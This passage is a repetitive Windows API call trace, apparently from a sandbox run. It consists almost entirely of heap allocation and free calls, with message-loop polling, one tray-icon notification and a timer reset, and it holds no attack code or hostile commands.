(HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.921] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0179.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0179.924] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0179.924] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0179.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.924] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0179.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.925] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0179.925] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0179.926] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.926] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.927] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.928] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0179.928] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.928] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.928] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0179.928] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.929] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.930] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.931] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.931] 